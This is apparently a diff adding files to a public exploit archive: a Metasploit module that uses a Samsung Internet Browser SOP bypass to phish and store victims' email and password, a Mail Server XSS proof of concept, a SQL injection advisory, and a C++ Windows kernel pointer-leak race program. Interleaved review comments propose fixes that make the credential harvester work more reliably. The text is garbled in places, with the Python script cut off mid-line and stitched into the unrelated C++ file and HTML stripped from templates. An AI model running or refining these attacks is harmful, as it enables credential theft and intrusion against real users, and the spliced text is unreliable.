diff --git a/exploits/android/remote/43376.rb b/exploits/android/remote/43376.rb
new file mode 100755
index 000000000..1de104b04
--- /dev/null
+++ b/exploits/android/remote/43376.rb
@@ -0,0 +1,144 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Exploit::Remote::HttpServer
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Samsung Internet Browser SOP Bypass',
+ 'Description' => %q(
+ This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the
+ Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices.
+ By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather
+ credentials via a fake pop-up.
+ ),
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'Dhiraj Mishra', # Original discovery, disclosure
+ 'Tod Beardsley', # Metasploit module
+ 'Jeffrey Martin' # Metasploit module
+ ],
+ 'References' => [
+ [ 'CVE', '2017-17692' ],
+ ['URL', 'http://fr.0day.today/exploit/description/28434']
+ ],
+ 'DisclosureDate' => 'Nov 08 2017',
+ 'Actions' => [[ 'WebServer' ]],
+ 'PassiveActions' => [ 'WebServer' ],
+ 'DefaultAction' => 'WebServer'
+ )
+ )
+
+ register_options([
+ OptString.new('TARGET_URL', [
+ true,
+ 'The URL to spoof origin from.',
+ 'http://example.com/'
+ ]),
+ OptString.new('CUSTOM_HTML', [
+ true,
+ 'HTML to display to the victim.',
+ 'This page has moved. Please click here to redirect your browser.'
+ ])
+ ])
+
+ register_advanced_options([
+ OptString.new('CUSTOM_JS', [
+ false,
+ "Custom Javascript to inject as the go() function. Use the variable 'x' to refer to the new tab.",
+ ''
+ ])
+ ])
+
+ end
+
+ def run
+ exploit # start http server
+ end
+
+ def evil_javascript
+ return datastore['CUSTOM_JS'] unless datastore['CUSTOM_JS'].blank?
+ js = <<-EOS
+ setTimeout(function(){
+ x.document.body.innerHTML='
404 Error
'+
+ 'Oops, something went wrong.
';
+ a=x.prompt('E-mail','');
+ b=x.prompt('Password','');
+ var cred=JSON.stringify({'user':a,'pass':b});
+ var xmlhttp = new XMLHttpRequest;
+ xmlhttp.open('POST', window.location, true);
+ xmlhttp.send(cred);
+ }, 3000);
+ EOS
+ js
+ end
+
+ def setup
+ @html = <<-EOS
+
+
+
+
+
+
+ #{datastore['CUSTOM_HTML']}
+
+ EOS
+ end
+
+ def store_cred(username,password)
+ credential_data = {
+ origin_type: :import,
+ module_fullname: self.fullname,
+ filename: 'msfconsole',
+ workspace_id: myworkspace_id,
+ service_name: 'web_service',
+ realm_value: datastore['TARGET_URL'],
+ realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+ private_type: :password,
+ private_data: password,
+ username: username
+ }
+ create_credential(credential_data)
+ end
+
+ # This assumes the default schema is being used.
+ # If it's not that, it'll just display the collected POST data.
+ def collect_data(request)
+ cred = JSON.parse(request.body)
+ u = cred['user']
+ p = cred['pass']
+ if u.blank? || p.blank?
+ print_good("#{cli.peerhost}: POST data received from #{datastore['TARGET_URL']}: #{request.body}")
+ else
+ print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}")
+ store_cred(u,p)
+ end
+ end
+
+ def on_request_uri(cli, request)
+ case request.method.downcase
+ when 'get' # initial connection
+ print_status("#{cli.peerhost}: Request '#{request.method} #{request.uri}'")
+ print_status("#{cli.peerhost}: Attempting to spoof origin for #{datastore['TARGET_URL']}")
+ send_response(cli, @html)
+ when 'post' # must have fallen for it
+ collect_data(request)
+ else
+ print_error("#{cli.peerhost}: Unhandled method: #{request.method}")
+ end
+ end
+
+end
\ No newline at end of file
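Review bot: `collect_data` interpolates `cli.peerhost` in both of its `print_good` calls, but `cli` is only a parameter of `on_request_uri` and is never passed in; unless the HttpServer mixin exposes a `cli` accessor, the first POST raises a NameError before anything is logged or stored. In the same method `JSON.parse(request.body)` is unguarded, so a non-JSON or non-object body (a malformed POST, or a client merely probing the listener) raises `JSON::ParserError` or `NoMethodError` on `cred['user']`, which contradicts the header comment's promise to "just display the collected POST data". Passing `cli` through and treating anything that does not parse to a Hash as raw POST data addresses both, with the call site in `on_request_uri` becoming `collect_data(cli, request)`. Note also that the HTML markup inside the `evil_javascript` and `setup` heredocs appears stripped in this rendering (the `setup` heredoc is mostly blank lines), so the served template cannot be reviewed from this view.
```ruby
  # Handle a POST from the served page. Bodies that are not a JSON object are
  # logged verbatim instead of raising.
  def collect_data(cli, request)
    cred = begin
      JSON.parse(request.body)
    rescue JSON::ParserError
      nil
    end
    unless cred.is_a?(Hash)
      print_good("#{cli.peerhost}: POST data received from #{datastore['TARGET_URL']}: #{request.body}")
      return
    end
    # … unchanged: extract 'user'/'pass', blank check, print_good, store_cred …
  end
```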
diff --git a/exploits/multiple/webapps/43378.py b/exploits/multiple/webapps/43378.py
new file mode 100755
index 000000000..c020e1758
--- /dev/null
+++ b/exploits/multiple/webapps/43378.py
@@ -0,0 +1,40 @@
+# Exploit Title: Ability Mail Server 3.3.2 Persistent Cross Site Scripting (XSS)
+# CVE: CVE-2017-17752
+# Date: 19-12-2017
+# Software Link: http://download.codecrafters.com/ams3.exe
+# Exploit Author: Aloyce J. Makalanga
+# Contact: https://twitter.com/aloycemjr
+# Vendor Homepage: http://www.codecrafters.com
+# Category: webapps
+# Attack Type: Remote
+# Impact: Data/Cookie theft
+
+
+1. Description
+
+
+ Ability Mail Server 3.3.2 has Persistent Cross Site Scripting (XSS) via the body of an e-mail message, with JavaScript code executed on the Read Mail screen (aka the /_readmail URI). To exploit the vulnerability, the victim must open an email with malicious Javascript inserted into the body of the email.
+
+
+
+2. Proof of Concept
+
+
+
+#!/usr/bin/env python
+email_addr = 'hacker@evil.local'
+email = 'From: %s\n' % email_addr
+email += 'To: %s\n' % email_addr
+email += 'Subject: XSS\n'
+email += 'Content-type: text/html\n\n'
+email +=''
+s = smtplib.SMTP(' k
+ # Child-SP RetAddr Call Site
+ 00 fffff880`03cfd8c8 fffff800`02970229 nt!memcpy+0x3
+ 01 fffff880`03cfd8d0 fffff800`02970752 nt!IopQueryNameInternal+0x289
+ 02 fffff880`03cfd970 fffff800`02967bb4 nt!IopQueryName+0x26
+ 03 fffff880`03cfd9c0 fffff800`0296a80d nt!ObpQueryNameString+0xb0
+ 04 fffff880`03cfdac0 fffff800`0268d093 nt!NtQueryVirtualMemory+0x5fb
+ 05 fffff880`03cfdbb0 00000000`772abf6a nt!KiSystemServiceCopyEnd+0x13
+--- cut ---
+
+An example of an output region is shown below:
+
+--- cut ---
+ kd> db rdx rdx+r8-1
+ fffff8a0`01a78010 2e 00 30 00 00 00 00 00-20 80 a7 01 a0 f8 ff ff ..0..... .......
+ fffff8a0`01a78020 5c 00 44 00 65 00 76 00-69 00 63 00 65 00 5c 00 \.D.e.v.i.c.e.\.
+ fffff8a0`01a78030 48 00 61 00 72 00 64 00-64 00 69 00 73 00 6b 00 H.a.r.d.d.i.s.k.
+ fffff8a0`01a78040 56 00 6f 00 6c 00 75 00-6d 00 65 00 32 00 00 00 V.o.l.u.m.e.2...
+--- cut ---
+
+Here, we can observe a kernel-mode address (fffff8a0`01a78020) of the textual string that follows the UNICODE_STRING, at offset 0x8. This means that the entire original kernel-mode structure is copied to ring-3, and then later the client's UNICODE_STRING.Buffer pointer is fixed up to point into the userland string. This condition could be referred to as a "double write" (as opposed to double fetch), where the kernel first copies some sensitive/confidential data into user-mode, and later overwrites it with legitimate output. Due to the synchronous way applications interact with the system, the clients only see the end result and therefore cannot observe the information disclosure that takes place in the meantime. However, it is possible to exploit the race condition if one is aware of the existence of such a bug.
+
+In order to obtain the leaked kernel pointer, we must read it in between the two writes. This is easiest achieved by running two concurrent threads (on a multi-core machine) -- one continuously invoking the affected NtQueryVirtualMemory syscall, and the other reading the UNICODE_STRING.Buffer member in a loop and checking if it's a kernel-mode pointer. This scheme is implemented in the attached proof-of-concept program. An example output from Windows 7 64-bit is as follows:
+
+--- cut ---
+ C:\>NtQueryVirtualMemory.exe
+ Leaked pointer: fffff8a0014b2010
+ Leaked pointer: fffff8a0014f5010
+ Leaked pointer: fffff8a00153b010
+ Leaked pointer: fffff8a001567010
+ Leaked pointer: fffff8a0015b1010
+ Leaked pointer: fffff8a0015c9010
+ Leaked pointer: fffff8a0015dc010
+ Leaked pointer: fffff8a0015f9010
+ Leaked pointer: fffff8a0017ff010
+ Leaked pointer: fffff8a00180b010
+ Leaked pointer: fffff8a001810010
+ Leaked pointer: fffff8a001832010
+ Leaked pointer: fffff8a001833010
+ Leaked pointer: fffff8a00182a010
+ [...]
+--- cut ---
+
+################################################################################
+
+Update: The insecure behavior of nt!IopQueryNameInternal can be also reached via nt!NtQueryObject. See the following stack trace:
+
+--- cut ---
+ kd> k
+ # Child-SP RetAddr Call Site
+ 00 fffff880`025548a8 fffff800`02970229 nt!memcpy+0x3
+ 01 fffff880`025548b0 fffff800`02970752 nt!IopQueryNameInternal+0x289
+ 02 fffff880`02554950 fffff800`02967bb4 nt!IopQueryName+0x26
+ 03 fffff880`025549a0 fffff800`02971f7d nt!ObpQueryNameString+0xb0
+ 04 fffff880`02554aa0 fffff800`0268d093 nt!NtQueryObject+0x1c7
+ 05 fffff880`02554bb0 00000000`772abe3a nt!KiSystemServiceCopyEnd+0x13
+--- cut ---
+
+And the region being copied:
+
+--- cut ---
+ kd> db rdx rdx+r8-1
+ fffff8a0`01666bf0 2e 00 30 00 00 00 00 00-00 6c 66 01 a0 f8 ff ff ..0......lf.....
+ fffff8a0`01666c00 5c 00 44 00 65 00 76 00-69 00 63 00 65 00 5c 00 \.D.e.v.i.c.e.\.
+ fffff8a0`01666c10 48 00 61 00 72 00 64 00-64 00 69 00 73 00 6b 00 H.a.r.d.d.i.s.k.
+ fffff8a0`01666c20 56 00 6f 00 6c 00 75 00-6d 00 65 00 32 00 00 00 V.o.l.u.m.e.2...
+--- cut ---
+
+Note the kernel-mode address fffff8a0`01666c00 at offset 0x8 of the memory dump.
+
+################################################################################
+
+MSRC have responded that their current policy with regards to addressing kernel pool pointer leaks is as follows:
+
+--- cut ---
+Please note that due to some By-Design kernel pointer leaks already present in our platforms, Information Disclosures which only disclose kernel pool pointers will only be serviced in v.Next until all by design disclosures can be resolved. Information Disclosures of uninitialized kernel memory will continue to be serviced via Security Updates. Any leaks within privileged processes will also be considered v.Next; unless you can supply PoC which proves that you can perform the same leak - but not kernel pool pointer leaks - as an unprivileged user.
+--- cut ---
+
+As this particular bug only facilitates the disclosure of kernel pool pointers, it was classified as a v.Next issue (fixed in a future version of Windows) and closed on the MSRC side. I'm therefore derestricting the details of the bug here, too.
+*/
+
+#include
+#include
+#include
+
+namespace globals {
+ BYTE OutputBuffer[1024];
+} // namespace globals
+
+typedef enum _MEMORY_INFORMATION_CLASS {
+ MemoryMappedFilenameInformation = 2
+} MEMORY_INFORMATION_CLASS;
+
+extern "C"
+NTSTATUS NTAPI NtQueryVirtualMemory(
+ _In_ HANDLE ProcessHandle,
+ _In_opt_ PVOID BaseAddress,
+ _In_ MEMORY_INFORMATION_CLASS MemoryInformationClass,
+ _Out_ PVOID MemoryInformation,
+ _In_ SIZE_T MemoryInformationLength,
+ _Out_opt_ PSIZE_T ReturnLength
+);
+
+BOOL IsKernelPointer(ULONG_PTR Pointer) {
+#ifdef _WIN64
+ return (Pointer >= 0xfff8000000000000);
+#else // 32-bit
+ return (Pointer >= 0x80000000);
+#endif
+}
+
+DWORD WINAPI ThreadProc(
+ _In_ LPVOID lpParameter
+) {
+ PUNICODE_STRING OutputString = (PUNICODE_STRING)globals::OutputBuffer;
+ ULONG_PTR LastPointer = 0;
+
+ while (1) {
+ ULONG_PTR Pointer = 0;
+ memcpy(&Pointer, &OutputString->Buffer, sizeof(ULONG_PTR));
+ if (IsKernelPointer(Pointer) && Pointer != LastPointer) {
+ printf("Leaked pointer: %Ix\n", Pointer);
+ LastPointer = Pointer;
+ }
+ }
+ return 0;
+}
+
+int main() {
+ CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL);
+
+ while (1) {
+ SIZE_T ReturnLength;
+ NTSTATUS st = NtQueryVirtualMemory(GetCurrentProcess(),
+ &main,
+ MemoryMappedFilenameInformation,
+ globals::OutputBuffer,
+ sizeof(globals::OutputBuffer),
+ &ReturnLength);
+
+ if (!NT_SUCCESS(st)) {
+ printf("NtQueryVirtualMemory failed, %x\n", st);
+ ExitProcess(1);
+ }
+ }
+
+ return 0;
+}
\ No newline at end of file
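Review bot: `smtplib.SMTP(` is called in the proof-of-concept without `import smtplib` anywhere in the added file, so the script fails with a NameError as written; the import belongs directly under the `#!/usr/bin/env python` line. The hunk header declares 40 added lines but the content runs far longer and, from `s = smtplib.SMTP(' k` onward, switches to what looks like a different file (a C++ Windows kernel proof-of-concept matching the `exploits/windows/dos/43380.cpp` entry added to `files_exploits.csv`), so the Python script is cut off and the remainder cannot be reviewed here. The numbered prose sections (`1. Description`, `2. Proof of Concept`) are also bare text rather than comments inside a `.py` file, so the file is not runnable as committed even once the import is fixed.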
diff --git a/exploits/windows/webapps/43379.txt b/exploits/windows/webapps/43379.txt
new file mode 100644
index 000000000..b51b84a3c
--- /dev/null
+++ b/exploits/windows/webapps/43379.txt
@@ -0,0 +1,49 @@
+# Exploit Title: SQL Injection
+# Date: 18 December, 2017
+# Exploit Author: Rajwinder Singh
+# Vendor Homepage: http://www.beims.com/products/
+# Software Link: http://www.beims.com/optional-modules/#ccw
+
+# Version: BEIMS ContractorWeb .NET System 5.18.0.0
+# CVE : 2017-17721
+
+
+Vulnerability Details:
+======================
+WEBNET/WOSummary/List in ZUUSE BEIMS ContractorWeb .NET 5.18.0.0 allows SQL injection via the tradestatus, assetno, assignto, building, domain, jobtype, site, trade, woType, workorderno, or workorderstatus parameter.
+
+Impact:
+======================
+1. Database compromise
+2. Server compromise
+3. Application defacement
+4. Internal network access and exploitation.
+
+
+Proof-of-Concept:
+====================
+1. Injected SQL injection payload under page "/CWEBNET/WOSummary/List" in post parameter 'tradestatus' and received SQL error response from server.
+2. Saved request in the text file to run automated SQLmap tool for further enumeration and successfully dumped full database which will not be disclosed.
+
+Affected Component:
+====================
+URL: www.domain.com/CWEBNET/WOSummary/List
+post parameters: tradestatus, assetno, assignto, building, domain, jobtype, site, trade, woType, workorderno, workorderstatus
+
+Disclosure Timeline:
+=====================
+Mitre Notification: 18 December, 2017
+Public Disclosure: 18 December, 2017
+
+Exploitation Technique:
+=======================
+Remote
+
+Severity Level:
+================
+Critical
+
+Description:
+=====================================================
+Request Method(s): [+] POST
+Vulnerable Product: [+] BEIMS ContractorWeb .NET System 5.18.0.0
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index db7b379ef..351a29450 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5431,6 +5431,7 @@ id,file,description,date,author,type,platform,port
43371,exploits/windows/dos/43371.html,"Microsoft Windows - 'jscript!JsArraySlice' Uninitialized Variable",2017-12-19,"Google Security Research",dos,windows,
43372,exploits/windows/dos/43372.html,"Microsoft Windows - 'jscript!RegExpFncObj::LastParen' Out-of-Bounds Read",2017-12-19,"Google Security Research",dos,windows,
43373,exploits/windows/dos/43373.txt,"Intel Content Protection HECI Service - Type Confusion Privilege Escalation",2017-12-19,"Google Security Research",dos,windows,
+43380,exploits/windows/dos/43380.cpp,"Microsoft Windows Kernel - 'NtQueryVirtualMemory(MemoryMappedFilenameInformation)' Double-Write Ring-0 Address Leak",2017-12-20,"Google Security Research",dos,windows,
41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
@@ -15860,6 +15861,7 @@ id,file,description,date,author,type,platform,port
43360,exploits/linux/remote/43360.py,"GoAhead httpd 2.5 < 3.6.5 - 'LD_PRELOAD' Remote Code Execution",2017-12-18,"Daniel Hodson",remote,linux,80
43374,exploits/php/remote/43374.rb,"Tuleap 9.6 - Second-Order PHP Object Injection (Metasploit)",2017-12-19,Metasploit,remote,php,443
43375,exploits/multiple/remote/43375.rb,"Jenkins - XStream Groovy classpath Deserialization (Metasploit)",2017-12-19,Metasploit,remote,multiple,8080
+43376,exploits/android/remote/43376.rb,"Samsung Internet Browser - SOP Bypass (Metasploit)",2017-12-20,"Dhiraj Mishra",remote,android,
41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
@@ -37652,6 +37654,8 @@ id,file,description,date,author,type,platform,port
43363,exploits/hardware/webapps/43363.py,"Linksys WVBR0 - 'User-Agent' Remote Command Injection",2017-12-14,nixawk,webapps,hardware,
43364,exploits/hardware/webapps/43364.txt,"BrightSign Digital Signage - Multiple Vulnerablities",2017-12-19,"Information Paradox",webapps,hardware,
43365,exploits/php/webapps/43365.txt,"Joomla! Component NextGen Editor 2.1.0 - 'plname' SQL Injection",2017-12-19,"Ihsan Sencan",webapps,php,
+43378,exploits/multiple/webapps/43378.py,"Ability Mail Server 3.3.2 - Cross-Site Scripting",2017-12-20,"Aloyce J. Makalanga",webapps,multiple,
+43379,exploits/windows/webapps/43379.txt,"BEIMS ContractorWeb 5.18.0.0 - SQL Injection",2017-12-20,"Rajwinder Singh",webapps,windows,
41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,